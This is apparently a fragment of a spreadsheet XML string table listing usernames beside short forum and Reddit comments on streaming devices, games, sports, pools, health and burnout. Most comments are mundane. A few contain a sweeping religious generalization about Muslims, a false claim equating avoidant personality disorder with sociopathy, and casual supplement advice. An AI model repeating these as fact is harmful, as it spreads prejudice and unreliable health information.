    <t>THX1138UK said: ↑ I’ve not experienced this. UHD/HDR 24 Hz Amazon Prime content via the Fire TV Stick is always smooth for me. I’m using the 2018 Fire TV stick with an Ethernet adapter and CAT5 connection, not Wi-Fi. I have previously experienced judder from BBC iPlayer and other Apps, when they have played 50 Hz content at 60 Hz. But this hasn’t been a problem for me recently. However, there are different generations of Fire TV devices, so some may handle it better than others. Difficult to make a suggestion regarding a possible fix, but it’s not a universal problem. It could be a compatibility issue with your specific TV model and Fire TV device. Can you try the Fire TV device on a different TV and/or try a friend’s Fire TV device with your TV? Regards, James. Thanks for the fast response James. Unfortunately I don’t know anyone else with a 4K uhd tv to test it. I do have other options for watching my Amazon stuff, I only bought the stick when Amazon knocked about £20 off this new stick (earlier this year). I wanted it to watch Jack Ryan in Dolby Vision and Atmos (which looked and sounded great) but Dolby Vision and Atmos shows are few and far between on Amazon. I like some of the other apps. I may have to try it with an Ethernet adapter but when I run Speedtest it tells me I’m already getting over 100Gbps.</t>
  </si>
  <si>
    <t>ACEKAiSHi</t>
  </si>
  <si>
    <t>Re: I’m a male voice actor Quote: #5 Post by ACEKAiSHi » Wed Sep 11, 2019 10:28 pm Quote: : ↑ Wed Sep 11, 2019 8:22 pm I haven't gotten the email yet. Do you have twitter or some where I can hear examples of your work? You can follow me on twitter @acekaishi and dm me and i’ll send you some of my voice acting if you’d like!</t>
  </si>
  <si>
    <t>Nelson4211</t>
  </si>
  <si>
    <t>TBCat said: ↑ Never get in the way of someone inventing his own reality. Not a single thread called for Stoops to be fired. Click to expand... I wasn’t the one saying. My first sentence agrees with you.</t>
  </si>
  <si>
    <t>Whydidideletemyaccou</t>
  </si>
  <si>
    <t>And yet most people don't give a shit because they're relatively healthy and when they're actually sick they're too grateful and in need that they take the hit on wait and quality. There seriously needs to be a change.</t>
  </si>
  <si>
    <t>Dead-Walker910</t>
  </si>
  <si>
    <t>thats personally why i like them i wanted a game to feel like i had to try to progress and DKS does just that</t>
  </si>
  <si>
    <t>TotesMessenger</t>
  </si>
  <si>
    <t>I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit: - [/r/justiceservedpure] [Kangaroo gets punched in the face while trying to strangle a dog - Posted September 07, 2019 at 06:35PM by zuccoff](https://www.reddit.com/r/JusticeServedPure/comments/d145nh/kangaroo_gets_punched_in_the_face_while_trying_to/) *^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*</t>
  </si>
  <si>
    <t>TheSnackist</t>
  </si>
  <si>
    <t>Hey, did the new hair options result in the loss of the 'bald' hair style for female aliens? wanted to update some space Barbie today but looks like I'm now forced to use a hairstyle?? bug?</t>
  </si>
  <si>
    <t>forwardslashroot</t>
  </si>
  <si>
    <t>None so far, but I'm the only one who logs in to the Shinobi. I tried to emulate multiple sessions by logging in via three different devices and have all 7 cameras on the dashboard being view all the same time. At the time, it seem to work fine. Also, if you're planning to keep the live view/dashboard up 24/7, I'm not sure if Shinobi can do that. It seems like it doesn't keep the live feed 24/7 and I don't know how long it would keep streaming, etc.</t>
  </si>
  <si>
    <t>shaneolds_tattoo</t>
  </si>
  <si>
    <t>Sorry I only have the +1 and +3</t>
  </si>
  <si>
    <t>lyndseymariee</t>
  </si>
  <si>
    <t>Why do so many men need their wife to tell them what to do? Keeping a tidy home is not rocket science. I wish I had some advice to give. This sounds incredibly frustrating. As elementary as it sounds, I've seen some women on here mention that they make a chore chart for their husband. Maybe this will help.</t>
  </si>
  <si>
    <t>bruins_fan</t>
  </si>
  <si>
    <t>Here are all the women who have been nominated for best director at the Oscars: *Lina Wertmüller, "Seven Beauties" (1977) *Jane Campion, "The Piano" (1994) *Sofia Coppola, "Lost in Translation" (2004) *Kathryn Bigelow, "The Hurt Locker" (2010) *Greta Gerwig, "Lady Bird" (2018)</t>
  </si>
  <si>
    <t>Decker</t>
  </si>
  <si>
    <t>This is a GREAT list. I’m curious: How does it compare to what you used for your ultra?</t>
  </si>
  <si>
    <t>sandyyy888</t>
  </si>
  <si>
    <t>Hahah both are great cities it's all good</t>
  </si>
  <si>
    <t>Mike</t>
  </si>
  <si>
    <t>i have apple ear pods too... these work a lot better and have a way better sound. the also are more secure than the apple ear pods. they stay in way better. glad i made this purchase.</t>
  </si>
  <si>
    <t>Straight_6</t>
  </si>
  <si>
    <t>A well-rolled 140 still slaps a 180 on controller, especially something like Ace. People have just been convinced that 140s are unusable for some reason.</t>
  </si>
  <si>
    <t>Sinaxramax</t>
  </si>
  <si>
    <t>You can check the LG's new ips model</t>
  </si>
  <si>
    <t>SleestakLightning</t>
  </si>
  <si>
    <t>I had a part where I laughed at him being incapable of picking up 2 yards because he's under six feet tall and can't fall forward two yards but I took it out because compared to Moncrief he's fucking Jerry Rice.</t>
  </si>
  <si>
    <t>buttstuffinabadwhig</t>
  </si>
  <si>
    <t>Good. All refs should abuse their powers. Ever since I watched Little Nicky I'm convinced this is the only way to make sport interesting.</t>
  </si>
  <si>
    <t>skullywithjam</t>
  </si>
  <si>
    <t>"Well that was the worst nightmare of my life."</t>
  </si>
  <si>
    <t>toastontom</t>
  </si>
  <si>
    <t>dude youre GORGEOUS. your dedication inspires me, thank you</t>
  </si>
  <si>
    <t>cammcken</t>
  </si>
  <si>
    <t>Hi all, just picked up the game recently, but I have some experience with other Paradox games. Seems that, as I build new plane models, my game automatically replaces the old models wiht the new ones. I can see this with a little arrow icon in the production menu: "Needed for Upgrades." However, I was doing some reading. Apparently I can convert old models into new models in for a reduced cost in the production menu. [This reddit post](https://www.reddit.com/r/hoi4/comments/6habb2/how_do_you_convert_equipment/) was helpful. Specifically, I have Italian CR.32 fighter and CR.42s, which are upgraded versions of the CR.32. That should be allowed, right? However, the "Convert from Stockpile" icon is greyed-out, with red text: "Currently there is no equipment in stock that we could use to convert to CR.42." So I tried sending some of my deployed CR.32s back to the stockpile. No change. Guess this isn't allowed?? Question: what happens to the old CR.32s after they've been replaced? Does the "convert from stockpile" process happen automatically? Am I getting the reduced cost for converting? Or are the old models simply trashed?</t>
  </si>
  <si>
    <t>BrettBarsouthsky</t>
  </si>
  <si>
    <t>I’m actually concerned for AB. This isnt normal guys.</t>
  </si>
  <si>
    <t>TennisKing</t>
  </si>
  <si>
    <t>Kittygirl said: ↑ I agree with her. *shrugs* Click to expand... Most 48 year old women cannot move like this, it was a compliment. No need for her insecure ass to attack someone else for nothing.</t>
  </si>
  <si>
    <t>Grimey_Rick</t>
  </si>
  <si>
    <t>this is becoming increasingly frustrating. it was bad enough that this was happening regularly with wild shinies, but now it's happening with raids too? it's one thing to have people wasting time catching, but now people are wasting money on shinies that aren't there too? this is either grossly negligent or just straight up shady. something seriously needs to change about how they handle shinies and the transitions between events. it's not right.</t>
  </si>
  <si>
    <t>chainsawinsect</t>
  </si>
  <si>
    <t>I would cut the haste and bump up the power to 1. "Costless" turn 1 ramp spells is dangerous design space.</t>
  </si>
  <si>
    <t>Wanhope</t>
  </si>
  <si>
    <t>ding ding sing Watch the CPC somehow eke out a victory and the first thing out of everyones mouths will be criticizing the FPTP system, and round and round we go again</t>
  </si>
  <si>
    <t>CONCRETE_LUBRICATOR</t>
  </si>
  <si>
    <t>That chick in the "Attack of the 50 Foot Woman"</t>
  </si>
  <si>
    <t>aiaisamurai</t>
  </si>
  <si>
    <t>I'm a copywriter, I tend to notice shit like that. But this is obviously just a lighthearted joke I made. With that said, technically speaking, I don't agree quotes around "up" is fine too. If he just said - going "up" is dead/not a thing anymore - yeah. But it seems he was clearly refering to the phrase "going up", so. Like I said, who gives a shit. Other poster said I'm "looking for reasons" lol. It's always a war to a lot of people here. I'm a big NXT fan, and it's great for Gargano that he's staying there IMO.</t>
  </si>
  <si>
    <t>onkel_Kaos</t>
  </si>
  <si>
    <t>Redditors who plays dungeon&amp;dragons who created a new race that the dm allowed. Dare to tell us how you thought up of that and did it get used again later on?</t>
  </si>
  <si>
    <t>Nichisi</t>
  </si>
  <si>
    <t>most fun i had in years</t>
  </si>
  <si>
    <t>Anonymous</t>
  </si>
  <si>
    <t>&gt;&gt;193772588 Here, it's just weird how they didn't bother to tease Dorothy and Beato. The christmas plushies cards had linchou/Doroshii but while every other card had gay messages, Dorothy''s card was like "here spending the day with my bro eleanor". It was hilarious.</t>
  </si>
  <si>
    <t>mollyBdaisy</t>
  </si>
  <si>
    <t>You mean when her shoes got stuck on the “elevator”?</t>
  </si>
  <si>
    <t>Bartolo001</t>
  </si>
  <si>
    <t>Read the label on each. Tylenol when fasting should be fine. Does the iron supplement say to take with food? If it does, follow those instructions.</t>
  </si>
  <si>
    <t>_a9o_</t>
  </si>
  <si>
    <t>Your soft skills are far more impactful than your technical skills when you look at a career long term. Being able to collaborate and communicate matters a lot.</t>
  </si>
  <si>
    <t>bzhen0915</t>
  </si>
  <si>
    <t>If you’re implying that I work for DoIT, no I actually don’t.</t>
  </si>
  <si>
    <t>nytraveler2016</t>
  </si>
  <si>
    <t>ToTR around sunset - so you can see Central Park as well as the whole city as it lights up at night.</t>
  </si>
  <si>
    <t>AceCombat9519</t>
  </si>
  <si>
    <t>12th Trending in the United States. If you have Spotify there is a link to it from the video and it took them 5 months between fancy and this one.</t>
  </si>
  <si>
    <t>SharkIe_Bumwich</t>
  </si>
  <si>
    <t>Ah there may have been confusion, avoidant personality disorder is a label of sociopathy and cannot be cured, dismissive-avoidant attachment style can change to secure attachment with time and effort. I don’t think he’s a narcissist, he takes accountability for his actions and apologizes when I’ve been hurt. And lots of his old distancing behaviors aren’t present anymore which is awesome, I’d consider last night an emotion burp of something I didn’t even know I had in me still</t>
  </si>
  <si>
    <t>Chickinvic</t>
  </si>
  <si>
    <t>Aquaman7 said: Hello, I live in NJ and in the early stages of planning for an in ground pool. A friend of mine who owns a pool said it’s better to have the pool installed now (Sept/Oct/Nov) to give the dirt a chance to settle before laying pavers around the pool. In NJ the pool season, without a heater starts approximately in June/July. To all you pool pros I ask, when will be the best time? This year Sept/Oct/Nov or next year March/April? Thank you for your time, Joe Click to expand... All I can advise is: get a heater! We are in Ottawa and I cannot even imagine having a pool without one. Even with our hot summers, the season would just be too short. We keep ours open May through mid-late October.</t>
  </si>
  <si>
    <t>Oworen25</t>
  </si>
  <si>
    <t>I think any team that plays well will win</t>
  </si>
  <si>
    <t>anotherdroid</t>
  </si>
  <si>
    <t>The United States Corporation</t>
  </si>
  <si>
    <t>Jkbdm</t>
  </si>
  <si>
    <t>16-4 record. Going huge on browns Browns 1st half -3.5 Browns -6 full game. Browns -8 +140 full game. Browns team total over when I can find it. Browns front 7 is going to kill simien. Simien will have 1 or 2 opportunities for a big play. There may be a huge td at some point but I expect a blow out. 37-17 type shit I would pound the over but I don’t trust the jets</t>
  </si>
  <si>
    <t>biscuitboyisaac21</t>
  </si>
  <si>
    <t>You can apply to be mine [here](https://youtu.be/dQw4w9WgXcQ)</t>
  </si>
  <si>
    <t>ahmadove</t>
  </si>
  <si>
    <t>All true. Also, flu comes in cold seasons for reasons involving humidity and temperature. Heat makes viruses unstable. And too much humidity = big water droplets that fall to the ground = aerosolized viral particles don't travel as far = less transmission of disease.</t>
  </si>
  <si>
    <t>Additional_System123</t>
  </si>
  <si>
    <t>Hi. First of all I’m so sorry this has happened to you. I have been struggling with eye problems for about a year. Almost as severe as you. I have been dealing with Lyme disease though, and have been treating that. I also have been using tretinion (retin a) for my still present acne (22 M). Yes, it’s helped a lot. But I just found it out might be behind my consistent and horrid eye irritation and redness. My eyes look bloodshot basically 24/7. Do you know if retin A (although it is a topical), can cause similar effects to accutane?</t>
  </si>
  <si>
    <t>thekrafty01</t>
  </si>
  <si>
    <t>The stats lie because it’s not the o-line that’s giving him time, he MAKES time by running away from the pocket. It’s why his accuracy is bad beyond 2.5 seconds. The throwing window has closed on the routes, and he’s throwing on the run while rolling to his right, trying to escape pressure.</t>
  </si>
  <si>
    <t>King1003</t>
  </si>
  <si>
    <t>I swear if this becomes a minefield because of that minute the covers weren’t on the pitch for.</t>
  </si>
  <si>
    <t>pupsnpogonas</t>
  </si>
  <si>
    <t>Email....or Zmail...</t>
  </si>
  <si>
    <t>Mawaya</t>
  </si>
  <si>
    <t>They want to drink, make merry, dance, sex endlessly without working.</t>
  </si>
  <si>
    <t>Daz_Blade</t>
  </si>
  <si>
    <t>Muller said: ↑ The main drawback with Walker though is that he is a horrendous defender. Click to expand... That's why we moved him to right back He's used his pace to recover defensively throughout his career, but I think it's much more difficult to rely on that as a centre half.</t>
  </si>
  <si>
    <t>The_Scholarly_Dumbos</t>
  </si>
  <si>
    <t>Maybe if you choose vets that don't specialize in rats. That's rarely the case with vets. My vet and all the assistants were friendly from the start. You shouldn't be advising to not go to the vet. They have years of experience and medical education that we do not have. We can treat them for small simple stuff, but not everything.</t>
  </si>
  <si>
    <t>Rammite</t>
  </si>
  <si>
    <t>i know that feeling too well I'm a massive fan of Dark Souls, so surely the Dark Souls Board Game would be amazing, right?!? It's been 3 and a half fucking years and we don't even have all the components. What a fucking waste of $400. I don't know what I was thinking, or if I *was* thinking.</t>
  </si>
  <si>
    <t>trianuddah</t>
  </si>
  <si>
    <t>Yup. Bottom line is, if you aren't willing to compromise everything for the almighty dollar, the Free Market^(R) will find someone who will.</t>
  </si>
  <si>
    <t>Tesseract91</t>
  </si>
  <si>
    <t>The merryweather one is rough though, even with a MK2. Miss me with that shit.</t>
  </si>
  <si>
    <t>0891_505050</t>
  </si>
  <si>
    <t>Disgusting how the ref gave a pen then. How the fuck.</t>
  </si>
  <si>
    <t>ElanaDryer</t>
  </si>
  <si>
    <t>Only assuming game attacks, outside the box Death Knight - Frost/Blood Druid - Hurricane, Typhoon, Tranquility Hunter - Frost Trap? Mage - frost spells Monk - Brews, Mistweavers, Paladin - Divine Storm? Priest - Purify? Rogue - Fog? Kick? Shaman - Water Element Warlock - Fel guard Wrathstorm? Warrior- Whirlwind?</t>
  </si>
  <si>
    <t>TheNinjaWhippet</t>
  </si>
  <si>
    <t>Dude! I'm so excited to watch it, reading about the production was really inspiring for me Especially when I may be planning on making something similar early next year I've actually already started making a digital BT Scanner and learning about motion-tracked compositing, after what I learnt about from your work on this :D</t>
  </si>
  <si>
    <t>&gt;&gt;267516915 You're free to ask the devs of AAU about that one, but Frontier never unlocked saturation.</t>
  </si>
  <si>
    <t>IUsedToBeACave</t>
  </si>
  <si>
    <t>&gt; I'm sure if you got yourself an older version of firefox for linux you could recreate it Think about what you are saying. There is an old version of Firefox that can be used to dump the password of a remote MySQL database? I can just do a Shodan.io query for exposed 3306 ports, and use this magic version of Firefox to own all those boxes? Come on. This makes no sense....</t>
  </si>
  <si>
    <t>YepIdiditagain</t>
  </si>
  <si>
    <t>A rather eloquent rebuttal for you. It is also ironic that you are complaining about hostility on this sub, yet here you are with your above comment.</t>
  </si>
  <si>
    <t>SpookyLlama</t>
  </si>
  <si>
    <t>[Question] Which one is my anti-depressants?</t>
  </si>
  <si>
    <t>Best_Boy143</t>
  </si>
  <si>
    <t>Learn to read. He wrote how it's not economically sustainable to buy 2 strains. It costs a dollar a day if you're ordering in bulk from a reputable online vendor and taking 12 grams a day. He's also saying he's going to try rhodiola which is a naturally occuring MOA. It works, but can seriously alter brain chemistry when taken regularly, so I'm warning him/her.</t>
  </si>
  <si>
    <t>Why do the Patriots consistently do classless things?</t>
  </si>
  <si>
    <t>ibeleaf420</t>
  </si>
  <si>
    <t>Should've made some cardboard boats, forced the kids in, then in 20 minutes you have your own new friends to trap in your very own grocery/jewelry store</t>
  </si>
  <si>
    <t>MeesterFingers</t>
  </si>
  <si>
    <t>I don't know. This was my first time going to this place.</t>
  </si>
  <si>
    <t>Battle_Fish</t>
  </si>
  <si>
    <t>Not impressed unless you do it dry. No spike. Highren on a BVeroah team can hit for 1 billion with just 9 orbs. That's what we need.</t>
  </si>
  <si>
    <t>Maveric04</t>
  </si>
  <si>
    <t>So I'm supposed to be hurt, delete or re-write the post? Not a chance. Cya.</t>
  </si>
  <si>
    <t>Because disney did the impossible and made star wars unpopular</t>
  </si>
  <si>
    <t>Tedskins</t>
  </si>
  <si>
    <t>IGN:smileytedd Discord Tag:smileytedd#4718 Previous guilds and time in each one including current guild:INFAMY (8 months), not sure about others (they were just my friends guilds) Main Gamemodes:SW sometimes Bedwars and mm if I want but not competitively What makes you unique (notable stats, leadership roles, etc...). If you don't have anything yet, give one personal IG goal you have: 15k kills in sw, 500 heads, and I could play about 20-30 hours a week, I want to get 15 star by the end of the month and level 100 Timezone ST (california) Reason you want to join GEEKS Guild Best Guild: I left my old guild, INFAMY, because it wasn't very active and didn't feel right for me because I needed an active community that I could converse with throughout discord. I also know a few of the geek members ig and they are really friendly (101drex being one of them) and im sure the whole team is like that if not close. Overall I thought It would be right for me to join because of the active team.</t>
  </si>
  <si>
    <t>snaftyroot</t>
  </si>
  <si>
    <t>well, then i would suggest learning javascript before learning a framework. there are two main aspects to javascript: the language and the DOM api the language itself is pretty small, or rather the std lib. there's no a lot to learn compared to other languages, but it has two significant differences from most popular languages that trip people up: prototype-based objects (as opposed to class-based) and dynamic scope binding (what `this` refers to). for this i'd suggest https://github.com/getify/You-Dont-Know-JS. it's a fairly small book that explains javascript from a class-based perspective. you dont need to internalize it all to get started, but just be aware that there are some less-than-obvious things going on that require a different way of thinking the DOM api (how you interact with html) is where interesting things happen. it's not inherently related to javascript. javascript is just the only thing we have available in browsers. it's pretty massive: https://developer.mozilla.org/en-US/docs/Web/API For a more targeted learning experience these are a good starting point: https://developer.mozilla.org/en-US/docs/Learn https://developer.mozilla.org/en-US/docs/Web For your specific scenario, you want to look into event binding (you said you just wanted hints)</t>
  </si>
  <si>
    <t>Linkage_</t>
  </si>
  <si>
    <t>It's a head tracking device, Google it, mate.</t>
  </si>
  <si>
    <t>AWildAmericanAppears</t>
  </si>
  <si>
    <t>I pledge allegiance to the flag!</t>
  </si>
  <si>
    <t>introvertwandering</t>
  </si>
  <si>
    <t>Where was this? Dundee has had so many break ins in the last few months, some in the neighborhood have said their vehicles are being broken into as much as once a week.</t>
  </si>
  <si>
    <t>sparcoevo</t>
  </si>
  <si>
    <t>Not sure if you're memeing, or if you've never heard of tattoo removal and hair dye before.</t>
  </si>
  <si>
    <t>newrater00</t>
  </si>
  <si>
    <t>Thanks for all the suggestions guys they were a big help and have changed my perspective.</t>
  </si>
  <si>
    <t>Lookingforawayoutnow</t>
  </si>
  <si>
    <t>A bike is nice but he saved a life, college at least should've been some what covered.</t>
  </si>
  <si>
    <t>Dappington</t>
  </si>
  <si>
    <t>But they do have a bloodline. Well they don't have a real "bloodline", since it's been around since before bloodlines were introduced, but all the male members of the line have the Sayyid trait.</t>
  </si>
  <si>
    <t>Malachite6</t>
  </si>
  <si>
    <t>I don't think I've ever heard of a more controlling mother. OP, your normal meter is seriously broken. She has made you terrified to leave her and you are convinced that you can't. (I understand it is difficult, but it is likely not impossible.) In my country what she is doing is a criminal offense.</t>
  </si>
  <si>
    <t>shauneko</t>
  </si>
  <si>
    <t>I love the varied styles, and the dramatic reveals for them! I dont know much of martial arts but its been educational in that way, and so so entertaining! Very underrated and im hoping for a continuation! Its fights stay fresh and wild!!</t>
  </si>
  <si>
    <t>Empty_Insight</t>
  </si>
  <si>
    <t>Username checks out? I'm talking about *real* Mexican food though, not Torchy's or Tex-Mex. Like the stuff where the building is made out of stucco and painted this really light but also kind of muted color, and/or there's bullet holes in the wall. The kind of place where they serve you Dr Pepper in a can, and there's always carne guisada on the menu. You can pick a completely random dish, and whatever you get will hit you right in your *soul*. It gets easier to find the closer you get to the border (like SA being a good example), but I've found a couple food trucks and restaurants that serve the real deal around here. Maybe it's not quite so obvious in California as it is here when it's a real Mexican restaurant, but I've just never been impressed, you know? Even if you can't find the real deal, the Chili's on 45th and Lamar is a pretty close second with their skillet queso and frosty margs.</t>
  </si>
  <si>
    <t>Rtgaen</t>
  </si>
  <si>
    <t>Dark soy sauce or butter</t>
  </si>
  <si>
    <t>MinFootspace</t>
  </si>
  <si>
    <t>Reminds me of a joke. A man comes back from his holidays and tells his coworker that his credit card got stolen. The coworker asks if he blocked the card imediately. The man replies : "Are you crazy? Those thieves spend much less money than my wife!"</t>
  </si>
  <si>
    <t>----you-have-to-laugh---</t>
  </si>
  <si>
    <t>no wonder he acts like a cornered flea bitten mutt in front of the dog pound van....</t>
  </si>
  <si>
    <t>mhatretush</t>
  </si>
  <si>
    <t>Aaaand, ofcourse, you had to bring in the DC card !</t>
  </si>
  <si>
    <t>MadLane22</t>
  </si>
  <si>
    <t>if the AI can save enough dip and adm points to get possitive stab and reduce exhaust after breaking truce sure, it would create more danger.</t>
  </si>
  <si>
    <t>manuking97</t>
  </si>
  <si>
    <t>Could you remove the lock screen interface to make it a wallpaper? Ty :)</t>
  </si>
  <si>
    <t>Svataben</t>
  </si>
  <si>
    <t>Plus, it might as well be called Blandy Melville. I just visited their site, and the stuff is so boring.</t>
  </si>
  <si>
    <t>&gt;&gt;42644017 PAP M85 or M85np and an adapter.</t>
  </si>
  <si>
    <t>Kraere</t>
  </si>
  <si>
    <t>The difference here is that Islamic terrorists murder FOR their religion in VAST numbers. The number of attacks "in the name of Allah" so greatly outnumbers the attacks in the name of the Christian/Jewish God, it's not even comparable... All 3 religions have a form of brainwashing, but only ONE brainwashes you to KILL FOR YOUR RELIGION! You have got to be kidding me, you can't clearly see this?</t>
  </si>
  <si>
    <t>Blissful_Altruism</t>
  </si>
  <si>
    <t>Slash based stuff like the Tigris work fine.</t>
  </si>
  <si>
    <t>iamshitforbrains</t>
  </si>
  <si>
    <t>Ubereats will meet you outside the park, they won’t come up to deliver your food</t>
  </si>
  <si>
    <t>imaddictedtofifa</t>
  </si>
  <si>
    <t>let the man scroll back into his photo album and post his proof ^^^^^^haha</t>
  </si>
  <si>
    <t>Black_Knight</t>
  </si>
  <si>
    <t>&gt;&gt;17788854 Reaper and Deva from what I've seen. Also, big note if you do the online missions against reclaimers groups, if you're the one that shoots one of them down, you can use their voice for their character. (And get new titles if you shoot down one and the entire team.) INB4, it's the same for single player &gt;&gt;17788936 Anyone who cares about the game already got it. Why would you watch a streamer play a game?</t>
  </si>
  <si>
    <t>provoaggie</t>
  </si>
  <si>
    <t>I got one that was printed really crooked and SunFrog replaced it no problem. Other than that I haven't had any issues with the print. I've had it since Christmas.</t>
  </si>
  <si>
    <t>Cortizone</t>
  </si>
  <si>
    <t>Originally Posted by K447 What parts did the shop actually replace? That is another part of the reason I am suspect if they really tried to find the source of the issues. They put in a new battery and that was it! (Previous battery had melted the negative terminal off). They say they cleaned corrosion off the cable. BTW, the previous battery was practically brand new...maybe 2-3 hours on it. Another possible BS statement from the tech..."You should not use an AGM battery in the waverunner...they don't seem to do well...always use conventional lead acid."??? I have never read that about the waverunner vx sport anywhere. Is that true or BS? They also said the corrosion issue was seen by them more often on the waverunner than other skis???</t>
  </si>
  <si>
    <t>phishingforlove</t>
  </si>
  <si>
    <t>Using a fleshlight to play darts</t>
  </si>
  <si>
    <t>hammocity</t>
  </si>
  <si>
    <t>BlueMoonRisin' said: ↑ Click to expand... Some of the Macc Lads lyrics are funny as fuck.</t>
  </si>
  <si>
    <t>BlitheCynic</t>
  </si>
  <si>
    <t>All my life, I have always had so much to do and so many places to be. I was an extreme overachiever in high school and graduated as valedictorian, but I still used to fake sick two or three times a month because I felt like I just couldn't take another day. I graduated from a top college with a 3.8 GPA. I got a scholarship and financial aid and faced zero debt. But I still broke down crying from anxiety at least once a week. Every paper I had to write and every test I had to study for was torture. I just kept thinking that if I just pushed past that hump, it would end, but it never seemed to end. Even summer vacation was ruined because not doing anything with my summers would "look bad" on my resume or grad school application. I panicked in my final semester because I was sure it would be impossible for me to get a job. Nevertheless, I managed to snag a cushy, well-paying office job right out of school. We had a fully stocked office fridge. They brought in Panera on Monday mornings. We had pizza parties and theme weeks and played video games during lunch. I was almost never required to stay past normal hours. The office was a five minute commute that didn't even require me to take the freeway. It was supposed to be over. That was supposed to be the goal. But it never ends. Instead, I went in five days a week for two years, staring at a screen, pouring my prime hours of my prime years into shit I could not care less about. I would sit in front of my computer for hours procrastinating, constantly looking over my shoulder, hoping nobody would notice I wasn't working, wracked with guilt. I made all my deadlines, but I constantly felt like a fraud because so much more of my effort went into just getting through the day. I took up smoking just to get out of the building. I went into the lounge and cried into the throw pillows. The hours between leaving the office and bedtime, everything I did was eclipsed by the knowledge that I had to do it all over again the next day. So I played it smart. I lived with my parents, put away almost all of my income, and amassed a nest egg that most of my friends could only dream of. I was a millennial with a net worth. That was supposed to be it. The goal. The end. But every day felt like walking through honey. Or tar. Even though I was making money, I was also wasting money. I was spending a lot on food because I was too tired to cook, and I felt like I would go crazy if I didn't get out of the office at lunch. I was spending on a gym membership because I was too tired to go hiking regularly. I was spending money on vacations because I needed escape, and my whole hometown felt like a prison. It never ends. After three years, I knew I couldn't do it any more. I had saved money, and there was no point if I didn't use it to escape. So I moved to a rural area and took my "dream job" at a non-profit, taking care of rescue animals. It was low-paying, but the area was much more affordable, and I was doing what I wanted to do. Despite the low pay, I lived frugally enough to save a modest amount without even touching my prior savings. For a while, it was great. Then the bureaucrats struck. With budget cutting, short-staffing, and a widening range of duties, we were being asked to do more every day without any increase in pay. We were treated by management with a disrespect that bordered on disdain. The animals suffered. We suffered. Eventually, a little over two years after I started, I threw in the towel. That was two months ago. I decided to take a real break. Although I have been making small moves toward becoming a freelancer, I have largely been taking it easy. I have been spending time with my pets, reading in my hammock, gardening, playing the guitar, doing art, going hiking, cooking, baking, housework, minor repairs (that I have been meaning to do for ages), and doing all manner of other things that require little money or even leaving my neighborhood. I eat fresh baked bread every morning with herbs I grew myself. I finally cleared out my garage so I can use it as an art space. I don't feel the need to run off to Japan or Germany or any of the other places I used to vacation because I needed to be as far away as possible from my job for a few weeks. I am probably the happiest I have ever been in my life, at least since I was a little kid. But the future keeps pressing on me. I have enough savings that I could pull this life off for a while - a year at least, probably a good amount more if I really keep my expenses low. My rent here is super reasonable, and even if I am in the middle of nowhere, I don't feel the need to escape as much as I used to. What used to be the prison I retired to to cry in between stretches of wage slavery is now my little modest corner of heaven. But I keep worrying about how long it can go on. I'm haunted by the thought of eventually running out of money and having to go back to the rat race. I've been looking into WWOOFing, homesteading, joining a commune of some kind. I am not afraid of hard work, and I would be willing to work much harder even than I have in the past if I were not so alienated from my labor and the beneficiaries of it. After years of living like Sisyphus, always trying to pretend the boulder won't come rolling back down on me, I finally know what I want out of life. I am finally learning that there is nothing wrong with it and nothing to be ashamed of. Now, I just have to pursue it. I can't let up, I can't chicken out, I can't ever go back. There is no way I can go back now that I know what I'm missing.</t>
  </si>
  <si>
    <t>Gebnya</t>
  </si>
  <si>
    <t>The city of Shakhty in the Rostov region. It is located near the Ukrainian border. I have never been there, so I can’t say for sure. There may also be dangerous cities in southern Siberia. They all are dying cities in general.</t>
  </si>
  <si>
    <t>joyful-stutterer</t>
  </si>
  <si>
    <t>I haven’t read his whole work yet but from what I’ve read Carl Jung doesn’t agree with Nietzsche’s philosophy. He says he was mistaken as a result of the oversubjectification of consciousness.</t>
  </si>
  <si>
    <t>TheSaucyProphesy</t>
  </si>
  <si>
    <t>Also, if you launch a game as a "live service" as an excuse for there being zero content in the game, that is essentially promising that you will create the rest of the game after some time. We've gotten 2 maps in a year, my guy. That deserves some anger</t>
  </si>
  <si>
    <t>cnbaslin</t>
  </si>
  <si>
    <t>Lazy mooches. No I don't want to drive you around. No I'm not picking up lunch for you. Hell no I'm not covering the bill for your night out. Buy your own drinks.</t>
  </si>
  <si>
    <t>Mining_elite222</t>
  </si>
  <si>
    <t>red matter explosives</t>
  </si>
  <si>
    <t>BetterBeLeafit</t>
  </si>
  <si>
    <t>(Shilton) Mike Babcock said he’s more confused about #Leafs defensive situation now than he was before the game. Team day off tomorrow, and sounds like cuts are forthcoming. Babcock wants practices to get way better, needs top guys together.</t>
  </si>
  <si>
    <t>Draumey</t>
  </si>
  <si>
    <t>I placed the see through floor panels from Island living, then build a half roof around it and put the ivys that come with the vampire game pack around the walls they are only see through the edges not fully over the entire floor. Here is a [Picture](https://gyazo.com/e243e51d83b839ee25dde97eb10a5704) that explains it and shows it abit better</t>
  </si>
  <si>
    <t>tonydante</t>
  </si>
  <si>
    <t>if you have a new telegram group or old but you need traffic and attention, PM @itsTonyhere on telegram for details</t>
  </si>
  <si>
    <t>Astra</t>
  </si>
  <si>
    <t>I think you are all wonderful, I'm seeing the oncologist on Monday regarding Chemo discussions. Is the treatment / meds length duration different for everyone? I guess so. Best wishes to every one. I never thought about losing nasal hair, your post did make me chuckle toward the end Jan x x</t>
  </si>
  <si>
    <t>Spooky110</t>
  </si>
  <si>
    <t>Was a 4k but i don't have editing software that does more than keep 1 clip. Don't wanna spend money and my laptop won't handle hitfilm.</t>
  </si>
  <si>
    <t>DB2009</t>
  </si>
  <si>
    <t>I'm 234 and I haven't had my Anatomy scan yet but I had a scan at 12 weeks and got perfect pictures! I've never had a problem and carry most of my weight in my belly too! Definitely a very unprofessional technician!</t>
  </si>
  <si>
    <t>bigjack78</t>
  </si>
  <si>
    <t>No he wasn't he was a semitic guy from the middle east. Probably dark by euro standards</t>
  </si>
  <si>
    <t>Hardcore Scape</t>
  </si>
  <si>
    <t>Please don't cringe at me vendoring Mageweave cloth I did it for the video! haha My Spec trees in this video Warrior Priest Mage Warlock Useful Macros I use #showtooltip /startattack /cast Demoralizing Shout #showtooltip /cast [nochanneling] Hellfire #showtooltip /cast [@Player] Rain of Fire; ----&gt; I Don't use this, but it may be useful if you cant keep up with heals. #showtooltip /cast [@eye of kilrogg] Power Word: Shield</t>
  </si>
  <si>
    <t>NoddingSmurf</t>
  </si>
  <si>
